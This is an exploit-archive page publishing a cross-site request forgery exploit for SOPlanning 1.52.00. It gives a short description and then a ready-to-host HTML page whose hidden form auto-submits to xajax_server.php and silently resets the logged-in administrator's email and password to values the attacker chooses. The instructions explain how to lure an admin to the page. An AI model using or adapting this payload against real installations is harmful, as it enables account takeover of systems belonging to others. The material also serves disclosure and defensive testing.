SOPlanning 1.52.00 Cross Site Request Forgery

SOPlanning 1.52.00 Cross Site Request Forgery: Posted May 3, 2024; Authored by liquidsky; SOPlanning version 1.52.00 suffers from a cross site request forgery vulnerability in xajax_server.php.; tags | exploit, php, csrf; SHA-256 | a3c73b7d4acc8e32c7247c327692a33f62025c56af9edaa24b5dfff34103fc5a; Download | Favorite | View

SOPlanning 1.52.00 Cross Site Request Forgery

<!--
Exploit Title: SOPlanning v1.52.00 'xajax_server.php' CSRF (Account Takeover)
Application: SOPlanning
Version: 1.52.00
Date: 4/22/24
Exploit Author: Joseph McPeters (Liquidsky)
Vendor Homepage: https://www.soplanning.org/en/
Software Link: https://sourceforge.net/projects/soplanning/
Tested on: Linux
CVE: Not yet assigned

Description: SOPlanning v1.52.00 is vulnerable to CSRF via 'xajax_server.php' a remote unautheticated attacker can hijack the admin account. The remote attacker can force the admins browser to make requests by sending them to an external page and update the admins password and email therefore taking over the admin panel.

Instructions: Host the exploit code included and have the admin visit the CSRF exploit page while logged in. It will be noticed that the password and email for the main admin have been changed to the specified email and password.

Liquidsky @ Specialized Security Services Inc. (S3) | Shout out to the team!
-->

<html>
  <body>
    <form action=https://fuzzlove.website/www/process/xajax_server.php method="POST">
      <input type="hidden" name="xajax" value="submitFormProfil" />
      <input type="hidden" name="xajaxr" value="" />
      <input type="hidden" name="xajaxargs[]" value="ADM" />
<!-- Update with attack email to change the admins email to yours -->
      <input type="hidden" name="xajaxargs[]" value=pwn@mail.lv<mailto:pwn@mail.lv> />
<!-- Update the following field to change the admins password to the password in the field -->
      <input type="hidden" name="xajaxargs[]" value="password" />
      <input type="hidden" name="xajaxargs[]" value="fr" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="false" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="false" />
      <input type="hidden" name="xajaxargs[]" value="0" />
      <input type="hidden" name="xajaxargs[]" value="1" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Top Authors In Last 30 Days

Red Hat 297 files
Ubuntu 60 files
Gentoo 32 files
Debian 31 files
LiquidWorm 10 files
Apple 9 files
malvuln 6 files
Adam Gowdiak 4 files
nu11secur1ty 4 files
Ahmet Umit Bayram 4 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,619)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,770)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,499)
UNIX (9,401)
UnixWare (187)
Windows (6,659)
Other

SOPlanning 1.52.00 Cross Site Request Forgery

SOPlanning 1.52.00 Cross Site Request Forgery

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SOPlanning 1.52.00 Cross Site Request Forgery

Share This

SOPlanning 1.52.00 Cross Site Request Forgery

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems